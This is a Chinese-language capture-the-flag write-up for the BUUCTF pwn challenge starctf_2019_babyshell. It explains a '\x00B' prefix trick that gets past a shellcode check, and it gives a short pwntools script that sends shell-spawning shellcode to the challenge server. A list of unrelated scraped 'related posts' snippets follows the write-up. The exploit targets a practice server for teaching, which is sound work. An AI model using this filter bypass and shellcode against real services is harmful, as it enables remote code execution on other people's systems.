[BUUCTF-pwn]——starctf_2019_babyshell

学到了, 又学到了FMYY师傅太强了

只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好

**\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查

当然其他汇编肯定也可以大家可以自己找找哈,看到别的师傅好像\x00J\x00也是可以滴

from pwn import *
context.arch = "amd64"
p = remote("node3.buuoj.cn",27993)
#p = process("./starctf_2019_babyshell")
payload = '\x00B3' + asm(shellcraft.sh())p.sendline(payload)
p.interactive()

[BUUCTF-pwn]——starctf_2019_babyshell相关推荐

  1. BUUCTF(pwn)starctf_2019_babyshell

    这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句. 所以我们 ...

  2. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  3. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  4. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  5. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  6. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

  7. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  8. Buuctf(pwn) picoctf_2018_rop chain 栈溢出

    32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...

  9. BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

    思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...

  10. Buuctf(pwn) jarvisoj_tell_me_something 栈溢出

    64位程序,开启了NX保护 400620 from pwn import *r=remote('node4.buuoj.cn',29273)flag_addr=0x400620payload='a'* ...

最新文章

  1. 第80节:Java中的MVC设计模式
  2. LumaQQ.NET操作指令制作(3)
  3. 缴纳满15年养老保险退休金每月1200块钱左右,值得缴吗?
  4. 线程同步,线程不同步_同步多线程集成测试
  5. 怎么把html转换成jpg6,html转为图片(六):xhtmlrenderer
  6. AngularJS.js: temple
  7. 交换机分布缓存_网络核心交换机和普通交换机有什么区别?
  8. 浅谈格斗游戏的精髓——方块的战争
  9. FreeRTOS的HOOK,以及(23)FreeRTOS 空闲任务分析
  10. Iometer存储测试工具参数说明- 2 Access Specifications
  11. mysql概念模型中的3种基本联系_数据库建模三步骤:概念模型
  12. PostgreSQL-Docker创建PostgreSQL数据库并导入矢量数据
  13. ionic3 教程(一)安装和配置 1
  14. 论文笔记:MPRNet: Multi-Stage Progressive Image Restoration
  15. 关于BAPI_CONTRACT_CREATEFROMDATA涉及使用价格
  16. 初识:链路聚合的小知识
  17. python开源ip代理池_[技术]基于python实现的短效代理ip池程序
  18. 如何创建自定义DevExpress报表控件,看完你就懂了
  19. 爱了,爱了,一款拯救直男的开源神器!
  20. 整数划分的递归实现算法c语言,整数划分算法原理与实现

热门文章

  1. 市场定位和硬件设计的错误-浅谈GM8126的封装
  2. android拨打电话
  3. .net面试题(高级)
  4. 【数据结构与算法】之深入解析“交错字符串”的求解思路与算法示例
  5. 将文件从HDFS复制到本地
  6. python虚拟环境virualenv的安装与使用
  7. 【Python5】图像操作,数字验证码识别,图像拼接/保存器
  8. 【Qt】简单Qt文本查找功能
  9. 【Linux】一步一步学Linux——reset命令(268)
  10. 【Linux网络编程】IP地址介绍